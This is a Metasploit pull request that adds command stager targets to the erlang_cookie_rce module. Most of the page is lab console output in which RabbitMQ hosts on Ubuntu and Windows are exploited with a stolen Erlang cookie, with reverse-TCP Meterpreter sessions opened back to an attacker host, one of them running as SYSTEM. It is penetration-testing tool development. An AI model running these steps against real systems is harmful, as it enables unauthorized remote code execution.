Add CmdStager to erlang_cookie_rce #11156

Merged
merged 1 commit into from Dec 21, 2018

jrobles-r7 commented Dec 21, 2018

Add command stager targets to erlang_cookie_rce for additional payload options.

Verification

List the steps needed to make sure this thing works

  • ./msfconsole -q
  • set target 1 (Linux CmdStager)
  • set cookie <cookie>
  • set rhosts <rhost>
  • set payload linux/x86/meterpreter/reverse_tcp
  • set lhost <lhost>
  • run

Scenarios

Tested on Ubuntu 16.04.5 LTS running rabbitmq-server

$ ./msfconsole -q 
msf5 > use multi/misc/erlang_cookie_rce
msf5 exploit(multi/misc/erlang_cookie_rce) > set target 1
target => 1
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie EYHXTKCXVOFTKHLXMQTG
cookie => EYHXTKCXVOFTKHLXMQTG
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.130
rhosts => 172.22.222.130
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.130:25672 - Receiving server challenge
[*] 172.22.222.130:25672 - Sending challenge reply
[+] 172.22.222.130:25672 - Authentication successful, sending payload
[*] 172.22.222.130:25672 - Exploiting...
[*] 172.22.222.130:25672 - Command Stager progress -  11.34% done (99/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  22.57% done (197/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  33.91% done (296/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  45.02% done (393/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  56.36% done (492/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  67.70% done (591/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  79.04% done (690/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  90.49% done (790/873 bytes)
[*] Sending stage (910632 bytes) to 172.22.222.130
[*] 172.22.222.130:25672 - Command Stager progress - 100.00% done (873/873 bytes)
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60444) at 2018-12-21 07:17:22 -0600

meterpreter > sysinfo
Computer     : 172.22.222.130
OS           : Ubuntu 16.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.130 - Meterpreter session 1 closed.  Reason: User exit

Tested on Windows 10 Pro running RabbitMQ Server

msf5 exploit(multi/misc/erlang_cookie_rce) > set target 3
target => 3
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie ZCCVYWSBUFNCNIYRZZCI
cookie => ZCCVYWSBUFNCNIYRZZCI
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.200:25672 - Receiving server challenge
[*] 172.22.222.200:25672 - Sending challenge reply
[+] 172.22.222.200:25672 - Authentication successful, sending payload
[*] 172.22.222.200:25672 - Exploiting...
[*] 172.22.222.200:25672 - Command Stager progress -   0.08% done (99/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.15% done (198/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.23% done (297/128281 bytes)
<snip. wait 5 minutes or so...>
[*] 172.22.222.200:25672 - Command Stager progress -  99.79% done (128007/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.86% done (128106/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.93% done (128189/128281 bytes)
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] 172.22.222.200:25672 - Command Stager progress - 100.00% done (128281/128281 bytes)
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:50835) at 2018-12-21 07:29:56 -0600

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(multi/misc/erlang_cookie_rce) > 

@busterb busterb self-assigned this Dec 21, 2018

busterb commented Dec 21, 2018

Verified on Linux, I'll trust you for Windows.

@busterb busterb merged commit 4bc871c into rapid7:master Dec 21, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Dec 21, 2018

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:feature/cmdstager-erlang-cookie branch Dec 21, 2018

msjenkins-r7 added a commit that referenced this pull request Dec 21, 2018

busterb commented Dec 21, 2018

Release Notes

This adds command stager support to the erlang_cookie_rce module, allowing for more flexibility in loading and executing payloads when targeting Linux and Windows.
